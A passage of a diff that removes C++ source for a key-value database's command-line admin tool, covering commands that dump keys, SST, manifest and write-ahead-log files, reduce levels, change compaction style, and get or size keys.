-  ret.append(" [--" + ARG_COUNT_ONLY + "]");
-  ret.append(" [--" + ARG_COUNT_DELIM + "=<char>]");
-  ret.append(" [--" + ARG_STATS + "]");
-  ret.append("\n");
-}
-
-void InternalDumpCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-
-  if (print_stats_) {
-    std::string stats;
-    if (db_->GetProperty(GetCfHandle(), "rocksdb.stats", &stats)) {
-      fprintf(stdout, "%s\n", stats.c_str());
-    }
-  }
-
-  // Cast as DBImpl to get internal iterator
-  std::vector<KeyVersion> key_versions;
-  Status st = GetAllKeyVersions(db_, from_, to_, &key_versions);
-  if (!st.ok()) {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-    return;
-  }
-  std::string rtype1, rtype2, row, val;
-  rtype2 = "";
-  uint64_t c=0;
-  uint64_t s1=0,s2=0;
-
-  long long count = 0;
-  for (auto& key_version : key_versions) {
-    InternalKey ikey(key_version.user_key, key_version.sequence,
-                     static_cast<ValueType>(key_version.type));
-    if (has_to_ && ikey.user_key() == to_) {
-      // GetAllKeyVersions() includes keys with user key `to_`, but idump has
-      // traditionally excluded such keys.
-      break;
-    }
-    ++count;
-    int k;
-    if (count_delim_) {
-      rtype1 = "";
-      s1=0;
-      row = ikey.Encode().ToString();
-      val = key_version.value;
-      for(k=0;row[k]!='\x01' && row[k]!='\0';k++)
-        s1++;
-      for(k=0;val[k]!='\x01' && val[k]!='\0';k++)
-        s1++;
-      for(int j=0;row[j]!=delim_[0] && row[j]!='\0' && row[j]!='\x01';j++)
-        rtype1+=row[j];
-      if(rtype2.compare("") && rtype2.compare(rtype1)!=0) {
-        fprintf(stdout,"%s => count:%lld\tsize:%lld\n",rtype2.c_str(),
-            (long long)c,(long long)s2);
-        c=1;
-        s2=s1;
-        rtype2 = rtype1;
-      } else {
-        c++;
-        s2+=s1;
-        rtype2=rtype1;
-      }
-    }
-
-    if (!count_only_ && !count_delim_) {
-      std::string key = ikey.DebugString(is_key_hex_);
-      std::string value = Slice(key_version.value).ToString(is_value_hex_);
-      std::cout << key << " => " << value << "\n";
-    }
-
-    // Terminate if maximum number of keys have been dumped
-    if (max_keys_ > 0 && count >= max_keys_) break;
-  }
-  if(count_delim_) {
-    fprintf(stdout,"%s => count:%lld\tsize:%lld\n", rtype2.c_str(),
-        (long long)c,(long long)s2);
-  } else
-  fprintf(stdout, "Internal keys in range: %lld\n", (long long) count);
-}
-
-const std::string DBDumperCommand::ARG_COUNT_ONLY = "count_only";
-const std::string DBDumperCommand::ARG_COUNT_DELIM = "count_delim";
-const std::string DBDumperCommand::ARG_STATS = "stats";
-const std::string DBDumperCommand::ARG_TTL_BUCKET = "bucket";
-
-DBDumperCommand::DBDumperCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, true,
-                 BuildCmdLineOptions(
-                     {ARG_TTL, ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX, ARG_FROM,
-                      ARG_TO, ARG_MAX_KEYS, ARG_COUNT_ONLY, ARG_COUNT_DELIM,
-                      ARG_STATS, ARG_TTL_START, ARG_TTL_END, ARG_TTL_BUCKET,
-                      ARG_TIMESTAMP, ARG_PATH})),
-      null_from_(true),
-      null_to_(true),
-      max_keys_(-1),
-      count_only_(false),
-      count_delim_(false),
-      print_stats_(false) {
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_FROM);
-  if (itr != options.end()) {
-    null_from_ = false;
-    from_ = itr->second;
-  }
-
-  itr = options.find(ARG_TO);
-  if (itr != options.end()) {
-    null_to_ = false;
-    to_ = itr->second;
-  }
-
-  itr = options.find(ARG_MAX_KEYS);
-  if (itr != options.end()) {
-    try {
-#if defined(CYGWIN)
-      max_keys_ = strtol(itr->second.c_str(), 0, 10);
-#else
-      max_keys_ = std::stoi(itr->second);
-#endif
-    } catch (const std::invalid_argument&) {
-      exec_state_ = LDBCommandExecuteResult::Failed(ARG_MAX_KEYS +
-                                                    " has an invalid value");
-    } catch (const std::out_of_range&) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          ARG_MAX_KEYS + " has a value out-of-range");
-    }
-  }
-  itr = options.find(ARG_COUNT_DELIM);
-  if (itr != options.end()) {
-    delim_ = itr->second;
-    count_delim_ = true;
-  } else {
-    count_delim_ = IsFlagPresent(flags, ARG_COUNT_DELIM);
-    delim_=".";
-  }
-
-  print_stats_ = IsFlagPresent(flags, ARG_STATS);
-  count_only_ = IsFlagPresent(flags, ARG_COUNT_ONLY);
-
-  if (is_key_hex_) {
-    if (!null_from_) {
-      from_ = HexToString(from_);
-    }
-    if (!null_to_) {
-      to_ = HexToString(to_);
-    }
-  }
-
-  itr = options.find(ARG_PATH);
-  if (itr != options.end()) {
-    path_ = itr->second;
-  }
-}
-
-void DBDumperCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DBDumperCommand::Name());
-  ret.append(HelpRangeCmdArgs());
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append(" [--" + ARG_MAX_KEYS + "=<N>]");
-  ret.append(" [--" + ARG_TIMESTAMP + "]");
-  ret.append(" [--" + ARG_COUNT_ONLY + "]");
-  ret.append(" [--" + ARG_COUNT_DELIM + "=<char>]");
-  ret.append(" [--" + ARG_STATS + "]");
-  ret.append(" [--" + ARG_TTL_BUCKET + "=<N>]");
-  ret.append(" [--" + ARG_TTL_START + "=<N>:- is inclusive]");
-  ret.append(" [--" + ARG_TTL_END + "=<N>:- is exclusive]");
-  ret.append(" [--" + ARG_PATH + "=<path_to_a_file>]");
-  ret.append("\n");
-}
-
-/**
- * Handles two separate cases:
- *
- * 1) --db is specified - just dump the database.
- *
- * 2) --path is specified - determine based on file extension what dumping
- *    function to call. Please note that we intentionally use the extension
- *    and avoid probing the file contents under the assumption that renaming
- *    the files is not a supported scenario.
- *
- */
-void DBDumperCommand::DoCommand() {
-  if (!db_) {
-    assert(!path_.empty());
-    std::string fileName = GetFileNameFromPath(path_);
-    uint64_t number;
-    FileType type;
-
-    exec_state_ = LDBCommandExecuteResult::Succeed("");
-
-    if (!ParseFileName(fileName, &number, &type)) {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed("Can't parse file type: " + path_);
-      return;
-    }
-
-    switch (type) {
-      case kLogFile:
-        DumpWalFile(path_, /* print_header_ */ true, /* print_values_ */ true,
-                    &exec_state_);
-        break;
-      case kTableFile:
-        DumpSstFile(path_, is_key_hex_, /* show_properties */ true);
-        break;
-      case kDescriptorFile:
-        DumpManifestFile(path_, /* verbose_ */ false, is_key_hex_,
-                         /*  json_ */ false);
-        break;
-      default:
-        exec_state_ = LDBCommandExecuteResult::Failed(
-            "File type not supported: " + path_);
-        break;
-    }
-
-  } else {
-    DoDumpCommand();
-  }
-}
-
-void DBDumperCommand::DoDumpCommand() {
-  assert(nullptr != db_);
-  assert(path_.empty());
-
-  // Parse command line args
-  uint64_t count = 0;
-  if (print_stats_) {
-    std::string stats;
-    if (db_->GetProperty("rocksdb.stats", &stats)) {
-      fprintf(stdout, "%s\n", stats.c_str());
-    }
-  }
-
-  // Setup key iterator
-  Iterator* iter = db_->NewIterator(ReadOptions(), GetCfHandle());
-  Status st = iter->status();
-  if (!st.ok()) {
-    exec_state_ =
-        LDBCommandExecuteResult::Failed("Iterator error." + st.ToString());
-  }
-
-  if (!null_from_) {
-    iter->Seek(from_);
-  } else {
-    iter->SeekToFirst();
-  }
-
-  int max_keys = max_keys_;
-  int ttl_start;
-  if (!ParseIntOption(option_map_, ARG_TTL_START, ttl_start, exec_state_)) {
-    ttl_start = DBWithTTLImpl::kMinTimestamp;  // TTL introduction time
-  }
-  int ttl_end;
-  if (!ParseIntOption(option_map_, ARG_TTL_END, ttl_end, exec_state_)) {
-    ttl_end = DBWithTTLImpl::kMaxTimestamp;  // Max time allowed by TTL feature
-  }
-  if (ttl_end < ttl_start) {
-    fprintf(stderr, "Error: End time can't be less than start time\n");
-    delete iter;
-    return;
-  }
-  int time_range = ttl_end - ttl_start;
-  int bucket_size;
-  if (!ParseIntOption(option_map_, ARG_TTL_BUCKET, bucket_size, exec_state_) ||
-      bucket_size <= 0) {
-    bucket_size = time_range; // Will have just 1 bucket by default
-  }
-  //cretaing variables for row count of each type
-  std::string rtype1, rtype2, row, val;
-  rtype2 = "";
-  uint64_t c=0;
-  uint64_t s1=0,s2=0;
-
-  // At this point, bucket_size=0 => time_range=0
-  int num_buckets = (bucket_size >= time_range)
-                        ? 1
-                        : ((time_range + bucket_size - 1) / bucket_size);
-  std::vector<uint64_t> bucket_counts(num_buckets, 0);
-  if (is_db_ttl_ && !count_only_ && timestamp_ && !count_delim_) {
-    fprintf(stdout, "Dumping key-values from %s to %s\n",
-            ReadableTime(ttl_start).c_str(), ReadableTime(ttl_end).c_str());
-  }
-
-  for (; iter->Valid(); iter->Next()) {
-    int rawtime = 0;
-    // If end marker was specified, we stop before it
-    if (!null_to_ && (iter->key().ToString() >= to_))
-      break;
-    // Terminate if maximum number of keys have been dumped
-    if (max_keys == 0)
-      break;
-    if (is_db_ttl_) {
-      TtlIterator* it_ttl = static_cast_with_check<TtlIterator, Iterator>(iter);
-      rawtime = it_ttl->timestamp();
-      if (rawtime < ttl_start || rawtime >= ttl_end) {
-        continue;
-      }
-    }
-    if (max_keys > 0) {
-      --max_keys;
-    }
-    if (is_db_ttl_ && num_buckets > 1) {
-      IncBucketCounts(bucket_counts, ttl_start, time_range, bucket_size,
-                      rawtime, num_buckets);
-    }
-    ++count;
-    if (count_delim_) {
-      rtype1 = "";
-      row = iter->key().ToString();
-      val = iter->value().ToString();
-      s1 = row.size()+val.size();
-      for(int j=0;row[j]!=delim_[0] && row[j]!='\0';j++)
-        rtype1+=row[j];
-      if(rtype2.compare("") && rtype2.compare(rtype1)!=0) {
-        fprintf(stdout,"%s => count:%lld\tsize:%lld\n",rtype2.c_str(),
-            (long long )c,(long long)s2);
-        c=1;
-        s2=s1;
-        rtype2 = rtype1;
-      } else {
-          c++;
-          s2+=s1;
-          rtype2=rtype1;
-      }
-
-    }
-
-
-
-    if (!count_only_ && !count_delim_) {
-      if (is_db_ttl_ && timestamp_) {
-        fprintf(stdout, "%s ", ReadableTime(rawtime).c_str());
-      }
-      std::string str =
-          PrintKeyValue(iter->key().ToString(), iter->value().ToString(),
-                        is_key_hex_, is_value_hex_);
-      fprintf(stdout, "%s\n", str.c_str());
-    }
-  }
-
-  if (num_buckets > 1 && is_db_ttl_) {
-    PrintBucketCounts(bucket_counts, ttl_start, ttl_end, bucket_size,
-                      num_buckets);
-  } else if(count_delim_) {
-    fprintf(stdout,"%s => count:%lld\tsize:%lld\n",rtype2.c_str(),
-        (long long )c,(long long)s2);
-  } else {
-    fprintf(stdout, "Keys in range: %lld\n", (long long) count);
-  }
-  // Clean up
-  delete iter;
-}
-
-const std::string ReduceDBLevelsCommand::ARG_NEW_LEVELS = "new_levels";
-const std::string ReduceDBLevelsCommand::ARG_PRINT_OLD_LEVELS =
-    "print_old_levels";
-
-ReduceDBLevelsCommand::ReduceDBLevelsCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_NEW_LEVELS, ARG_PRINT_OLD_LEVELS})),
-      old_levels_(1 << 7),
-      new_levels_(-1),
-      print_old_levels_(false) {
-  ParseIntOption(option_map_, ARG_NEW_LEVELS, new_levels_, exec_state_);
-  print_old_levels_ = IsFlagPresent(flags, ARG_PRINT_OLD_LEVELS);
-
-  if(new_levels_ <= 0) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        " Use --" + ARG_NEW_LEVELS + " to specify a new level number\n");
-  }
-}
-
-std::vector<std::string> ReduceDBLevelsCommand::PrepareArgs(
-    const std::string& db_path, int new_levels, bool print_old_level) {
-  std::vector<std::string> ret;
-  ret.push_back("reduce_levels");
-  ret.push_back("--" + ARG_DB + "=" + db_path);
-  ret.push_back("--" + ARG_NEW_LEVELS + "=" + rocksdb::ToString(new_levels));
-  if(print_old_level) {
-    ret.push_back("--" + ARG_PRINT_OLD_LEVELS);
-  }
-  return ret;
-}
-
-void ReduceDBLevelsCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ReduceDBLevelsCommand::Name());
-  ret.append(" --" + ARG_NEW_LEVELS + "=<New number of levels>");
-  ret.append(" [--" + ARG_PRINT_OLD_LEVELS + "]");
-  ret.append("\n");
-}
-
-Options ReduceDBLevelsCommand::PrepareOptionsForOpenDB() {
-  Options opt = LDBCommand::PrepareOptionsForOpenDB();
-  opt.num_levels = old_levels_;
-  opt.max_bytes_for_level_multiplier_additional.resize(opt.num_levels, 1);
-  // Disable size compaction
-  opt.max_bytes_for_level_base = 1ULL << 50;
-  opt.max_bytes_for_level_multiplier = 1;
-  return opt;
-}
-
-Status ReduceDBLevelsCommand::GetOldNumOfLevels(Options& opt,
-    int* levels) {
-  ImmutableDBOptions db_options(opt);
-  EnvOptions soptions;
-  std::shared_ptr<Cache> tc(
-      NewLRUCache(opt.max_open_files - 10, opt.table_cache_numshardbits));
-  const InternalKeyComparator cmp(opt.comparator);
-  WriteController wc(opt.delayed_write_rate);
-  WriteBufferManager wb(opt.db_write_buffer_size);
-  VersionSet versions(db_path_, &db_options, soptions, tc.get(), &wb, &wc);
-  std::vector<ColumnFamilyDescriptor> dummy;
-  ColumnFamilyDescriptor dummy_descriptor(kDefaultColumnFamilyName,
-                                          ColumnFamilyOptions(opt));
-  dummy.push_back(dummy_descriptor);
-  // We rely the VersionSet::Recover to tell us the internal data structures
-  // in the db. And the Recover() should never do any change
-  // (like LogAndApply) to the manifest file.
-  Status st = versions.Recover(dummy);
-  if (!st.ok()) {
-    return st;
-  }
-  int max = -1;
-  auto default_cfd = versions.GetColumnFamilySet()->GetDefault();
-  for (int i = 0; i < default_cfd->NumberLevels(); i++) {
-    if (default_cfd->current()->storage_info()->NumLevelFiles(i)) {
-      max = i;
-    }
-  }
-
-  *levels = max + 1;
-  return st;
-}
-
-void ReduceDBLevelsCommand::DoCommand() {
-  if (new_levels_ <= 1) {
-    exec_state_ =
-        LDBCommandExecuteResult::Failed("Invalid number of levels.\n");
-    return;
-  }
-
-  Status st;
-  Options opt = PrepareOptionsForOpenDB();
-  int old_level_num = -1;
-  st = GetOldNumOfLevels(opt, &old_level_num);
-  if (!st.ok()) {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-    return;
-  }
-
-  if (print_old_levels_) {
-    fprintf(stdout, "The old number of levels in use is %d\n", old_level_num);
-  }
-
-  if (old_level_num <= new_levels_) {
-    return;
-  }
-
-  old_levels_ = old_level_num;
-
-  OpenDB();
-  if (exec_state_.IsFailed()) {
-    return;
-  }
-  // Compact the whole DB to put all files to the highest level.
-  fprintf(stdout, "Compacting the db...\n");
-  db_->CompactRange(CompactRangeOptions(), GetCfHandle(), nullptr, nullptr);
-  CloseDB();
-
-  EnvOptions soptions;
-  st = VersionSet::ReduceNumberOfLevels(db_path_, &opt, soptions, new_levels_);
-  if (!st.ok()) {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-    return;
-  }
-}
-
-const std::string ChangeCompactionStyleCommand::ARG_OLD_COMPACTION_STYLE =
-    "old_compaction_style";
-const std::string ChangeCompactionStyleCommand::ARG_NEW_COMPACTION_STYLE =
-    "new_compaction_style";
-
-ChangeCompactionStyleCommand::ChangeCompactionStyleCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions(
-                     {ARG_OLD_COMPACTION_STYLE, ARG_NEW_COMPACTION_STYLE})),
-      old_compaction_style_(-1),
-      new_compaction_style_(-1) {
-  ParseIntOption(option_map_, ARG_OLD_COMPACTION_STYLE, old_compaction_style_,
-    exec_state_);
-  if (old_compaction_style_ != kCompactionStyleLevel &&
-     old_compaction_style_ != kCompactionStyleUniversal) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Use --" + ARG_OLD_COMPACTION_STYLE + " to specify old compaction " +
-        "style. Check ldb help for proper compaction style value.\n");
-    return;
-  }
-
-  ParseIntOption(option_map_, ARG_NEW_COMPACTION_STYLE, new_compaction_style_,
-    exec_state_);
-  if (new_compaction_style_ != kCompactionStyleLevel &&
-     new_compaction_style_ != kCompactionStyleUniversal) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Use --" + ARG_NEW_COMPACTION_STYLE + " to specify new compaction " +
-        "style. Check ldb help for proper compaction style value.\n");
-    return;
-  }
-
-  if (new_compaction_style_ == old_compaction_style_) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Old compaction style is the same as new compaction style. "
-        "Nothing to do.\n");
-    return;
-  }
-
-  if (old_compaction_style_ == kCompactionStyleUniversal &&
-      new_compaction_style_ == kCompactionStyleLevel) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Convert from universal compaction to level compaction. "
-        "Nothing to do.\n");
-    return;
-  }
-}
-
-void ChangeCompactionStyleCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ChangeCompactionStyleCommand::Name());
-  ret.append(" --" + ARG_OLD_COMPACTION_STYLE + "=<Old compaction style: 0 " +
-             "for level compaction, 1 for universal compaction>");
-  ret.append(" --" + ARG_NEW_COMPACTION_STYLE + "=<New compaction style: 0 " +
-             "for level compaction, 1 for universal compaction>");
-  ret.append("\n");
-}
-
-Options ChangeCompactionStyleCommand::PrepareOptionsForOpenDB() {
-  Options opt = LDBCommand::PrepareOptionsForOpenDB();
-
-  if (old_compaction_style_ == kCompactionStyleLevel &&
-      new_compaction_style_ == kCompactionStyleUniversal) {
-    // In order to convert from level compaction to universal compaction, we
-    // need to compact all data into a single file and move it to level 0.
-    opt.disable_auto_compactions = true;
-    opt.target_file_size_base = INT_MAX;
-    opt.target_file_size_multiplier = 1;
-    opt.max_bytes_for_level_base = INT_MAX;
-    opt.max_bytes_for_level_multiplier = 1;
-  }
-
-  return opt;
-}
-
-void ChangeCompactionStyleCommand::DoCommand() {
-  // print db stats before we have made any change
-  std::string property;
-  std::string files_per_level;
-  for (int i = 0; i < db_->NumberLevels(GetCfHandle()); i++) {
-    db_->GetProperty(GetCfHandle(),
-                     "rocksdb.num-files-at-level" + NumberToString(i),
-                     &property);
-
-    // format print string
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%s%s", (i ? "," : ""), property.c_str());
-    files_per_level += buf;
-  }
-  fprintf(stdout, "files per level before compaction: %s\n",
-          files_per_level.c_str());
-
-  // manual compact into a single file and move the file to level 0
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 0;
-  db_->CompactRange(compact_options, GetCfHandle(), nullptr, nullptr);
-
-  // verify compaction result
-  files_per_level = "";
-  int num_files = 0;
-  for (int i = 0; i < db_->NumberLevels(GetCfHandle()); i++) {
-    db_->GetProperty(GetCfHandle(),
-                     "rocksdb.num-files-at-level" + NumberToString(i),
-                     &property);
-
-    // format print string
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%s%s", (i ? "," : ""), property.c_str());
-    files_per_level += buf;
-
-    num_files = atoi(property.c_str());
-
-    // level 0 should have only 1 file
-    if (i == 0 && num_files != 1) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "Number of db files at "
-          "level 0 after compaction is " +
-          ToString(num_files) + ", not 1.\n");
-      return;
-    }
-    // other levels should have no file
-    if (i > 0 && num_files != 0) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "Number of db files at "
-          "level " +
-          ToString(i) + " after compaction is " + ToString(num_files) +
-          ", not 0.\n");
-      return;
-    }
-  }
-
-  fprintf(stdout, "files per level after compaction: %s\n",
-          files_per_level.c_str());
-}
-
-// ----------------------------------------------------------------------------
-
-namespace {
-
-struct StdErrReporter : public log::Reader::Reporter {
-  virtual void Corruption(size_t bytes, const Status& s) override {
-    std::cerr << "Corruption detected in log file " << s.ToString() << "\n";
-  }
-};
-
-class InMemoryHandler : public WriteBatch::Handler {
- public:
-  InMemoryHandler(std::stringstream& row, bool print_values)
-      : Handler(), row_(row) {
-    print_values_ = print_values;
-  }
-
-  void commonPutMerge(const Slice& key, const Slice& value) {
-    std::string k = LDBCommand::StringToHex(key.ToString());
-    if (print_values_) {
-      std::string v = LDBCommand::StringToHex(value.ToString());
-      row_ << k << " : ";
-      row_ << v << " ";
-    } else {
-      row_ << k << " ";
-    }
-  }
-
-  virtual Status PutCF(uint32_t cf, const Slice& key,
-                       const Slice& value) override {
-    row_ << "PUT(" << cf << ") : ";
-    commonPutMerge(key, value);
-    return Status::OK();
-  }
-
-  virtual Status MergeCF(uint32_t cf, const Slice& key,
-                         const Slice& value) override {
-    row_ << "MERGE(" << cf << ") : ";
-    commonPutMerge(key, value);
-    return Status::OK();
-  }
-
-  virtual Status DeleteCF(uint32_t cf, const Slice& key) override {
-    row_ << "DELETE(" << cf << ") : ";
-    row_ << LDBCommand::StringToHex(key.ToString()) << " ";
-    return Status::OK();
-  }
-
-  virtual Status SingleDeleteCF(uint32_t cf, const Slice& key) override {
-    row_ << "SINGLE_DELETE(" << cf << ") : ";
-    row_ << LDBCommand::StringToHex(key.ToString()) << " ";
-    return Status::OK();
-  }
-
-  virtual Status DeleteRangeCF(uint32_t cf, const Slice& begin_key,
-                               const Slice& end_key) override {
-    row_ << "DELETE_RANGE(" << cf << ") : ";
-    row_ << LDBCommand::StringToHex(begin_key.ToString()) << " ";
-    row_ << LDBCommand::StringToHex(end_key.ToString()) << " ";
-    return Status::OK();
-  }
-
-  virtual Status MarkBeginPrepare() override {
-    row_ << "BEGIN_PREARE ";
-    return Status::OK();
-  }
-
-  virtual Status MarkEndPrepare(const Slice& xid) override {
-    row_ << "END_PREPARE(";
-    row_ << LDBCommand::StringToHex(xid.ToString()) << ") ";
-    return Status::OK();
-  }
-
-  virtual Status MarkRollback(const Slice& xid) override {
-    row_ << "ROLLBACK(";
-    row_ << LDBCommand::StringToHex(xid.ToString()) << ") ";
-    return Status::OK();
-  }
-
-  virtual Status MarkCommit(const Slice& xid) override {
-    row_ << "COMMIT(";
-    row_ << LDBCommand::StringToHex(xid.ToString()) << ") ";
-    return Status::OK();
-  }
-
-  virtual ~InMemoryHandler() {}
-
- private:
-  std::stringstream& row_;
-  bool print_values_;
-};
-
-void DumpWalFile(std::string wal_file, bool print_header, bool print_values,
-                 LDBCommandExecuteResult* exec_state) {
-  Env* env_ = Env::Default();
-  EnvOptions soptions;
-  unique_ptr<SequentialFileReader> wal_file_reader;
-
-  Status status;
-  {
-    unique_ptr<SequentialFile> file;
-    status = env_->NewSequentialFile(wal_file, &file, soptions);
-    if (status.ok()) {
-      wal_file_reader.reset(new SequentialFileReader(std::move(file)));
-    }
-  }
-  if (!status.ok()) {
-    if (exec_state) {
-      *exec_state = LDBCommandExecuteResult::Failed("Failed to open WAL file " +
-                                                    status.ToString());
-    } else {
-      std::cerr << "Error: Failed to open WAL file " << status.ToString()
-                << std::endl;
-    }
-  } else {
-    StdErrReporter reporter;
-    uint64_t log_number;
-    FileType type;
-
-    // we need the log number, but ParseFilename expects dbname/NNN.log.
-    std::string sanitized = wal_file;
-    size_t lastslash = sanitized.rfind('/');
-    if (lastslash != std::string::npos)
-      sanitized = sanitized.substr(lastslash + 1);
-    if (!ParseFileName(sanitized, &log_number, &type)) {
-      // bogus input, carry on as best we can
-      log_number = 0;
-    }
-    DBOptions db_options;
-    log::Reader reader(db_options.info_log, std::move(wal_file_reader),
-                       &reporter, true, 0, log_number);
-    std::string scratch;
-    WriteBatch batch;
-    Slice record;
-    std::stringstream row;
-    if (print_header) {
-      std::cout << "Sequence,Count,ByteSize,Physical Offset,Key(s)";
-      if (print_values) {
-        std::cout << " : value ";
-      }
-      std::cout << "\n";
-    }
-    while (reader.ReadRecord(&record, &scratch)) {
-      row.str("");
-      if (record.size() < WriteBatchInternal::kHeader) {
-        reporter.Corruption(record.size(),
-                            Status::Corruption("log record too small"));
-      } else {
-        WriteBatchInternal::SetContents(&batch, record);
-        row << WriteBatchInternal::Sequence(&batch) << ",";
-        row << WriteBatchInternal::Count(&batch) << ",";
-        row << WriteBatchInternal::ByteSize(&batch) << ",";
-        row << reader.LastRecordOffset() << ",";
-        InMemoryHandler handler(row, print_values);
-        batch.Iterate(&handler);
-        row << "\n";
-      }
-      std::cout << row.str();
-    }
-  }
-}
-
-}  // namespace
-
-const std::string WALDumperCommand::ARG_WAL_FILE = "walfile";
-const std::string WALDumperCommand::ARG_PRINT_VALUE = "print_value";
-const std::string WALDumperCommand::ARG_PRINT_HEADER = "header";
-
-WALDumperCommand::WALDumperCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, true,
-                 BuildCmdLineOptions(
-                     {ARG_WAL_FILE, ARG_PRINT_HEADER, ARG_PRINT_VALUE})),
-      print_header_(false),
-      print_values_(false) {
-  wal_file_.clear();
-
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_WAL_FILE);
-  if (itr != options.end()) {
-    wal_file_ = itr->second;
-  }
-
-
-  print_header_ = IsFlagPresent(flags, ARG_PRINT_HEADER);
-  print_values_ = IsFlagPresent(flags, ARG_PRINT_VALUE);
-  if (wal_file_.empty()) {
-    exec_state_ = LDBCommandExecuteResult::Failed("Argument " + ARG_WAL_FILE +
-                                                  " must be specified.");
-  }
-}
-
-void WALDumperCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(WALDumperCommand::Name());
-  ret.append(" --" + ARG_WAL_FILE + "=<write_ahead_log_file_path>");
-  ret.append(" [--" + ARG_PRINT_HEADER + "] ");
-  ret.append(" [--" + ARG_PRINT_VALUE + "] ");
-  ret.append("\n");
-}
-
-void WALDumperCommand::DoCommand() {
-  DumpWalFile(wal_file_, print_header_, print_values_, &exec_state_);
-}
-
-// ----------------------------------------------------------------------------
-
-GetCommand::GetCommand(const std::vector<std::string>& params,
-                       const std::map<std::string, std::string>& options,
-                       const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, true,
-          BuildCmdLineOptions({ARG_TTL, ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX})) {
-  if (params.size() != 1) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "<key> must be specified for the get command");
-  } else {
-    key_ = params.at(0);
-  }
-
-  if (is_key_hex_) {
-    key_ = HexToString(key_);
-  }
-}
-
-void GetCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(GetCommand::Name());
-  ret.append(" <key>");
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append("\n");
-}
-
-void GetCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  std::string value;
-  Status st = db_->Get(ReadOptions(), GetCfHandle(), key_, &value);
-  if (st.ok()) {
-    fprintf(stdout, "%s\n",
-              (is_value_hex_ ? StringToHex(value) : value).c_str());
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-ApproxSizeCommand::ApproxSizeCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, true,
-                 BuildCmdLineOptions(
-                     {ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX, ARG_FROM, ARG_TO})) {
-  if (options.find(ARG_FROM) != options.end()) {
-    start_key_ = options.find(ARG_FROM)->second;
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        ARG_FROM + " must be specified for approxsize command");
-    return;
-  }
-
-  if (options.find(ARG_TO) != options.end()) {
-    end_key_ = options.find(ARG_TO)->second;
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        ARG_TO + " must be specified for approxsize command");
-    return;
-  }
-
-  if (is_key_hex_) {
-    start_key_ = HexToString(start_key_);
-    end_key_ = HexToString(end_key_);
-  }
-}
-
-void ApproxSizeCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ApproxSizeCommand::Name());
-  ret.append(HelpRangeCmdArgs());
-  ret.append("\n");
-}
-
-void ApproxSizeCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Range ranges[1];
-  ranges[0] = Range(start_key_, end_key_);
-  uint64_t sizes[1];
-  db_->GetApproximateSizes(GetCfHandle(), ranges, 1, sizes);
-  fprintf(stdout, "%lu\n", (unsigned long)sizes[0]);
-  /* Weird that GetApproximateSizes() returns void, although documentation
-   * says that it returns a Status object.
-  if (!st.ok()) {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-  */
-}
-
-// ----------------------------------------------------------------------------
-
-BatchPutCommand::BatchPutCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_TTL, ARG_HEX, ARG_KEY_HEX,
-                                      ARG_VALUE_HEX, ARG_CREATE_IF_MISSING})) {
-  if (params.size() < 2) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "At least one <key> <value> pair must be specified batchput.");
-  } else if (params.size() % 2 != 0) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Equal number of <key>s and <value>s must be specified for batchput.");
-  } else {
-    for (size_t i = 0; i < params.size(); i += 2) {
-      std::string key = params.at(i);
-      std::string value = params.at(i + 1);
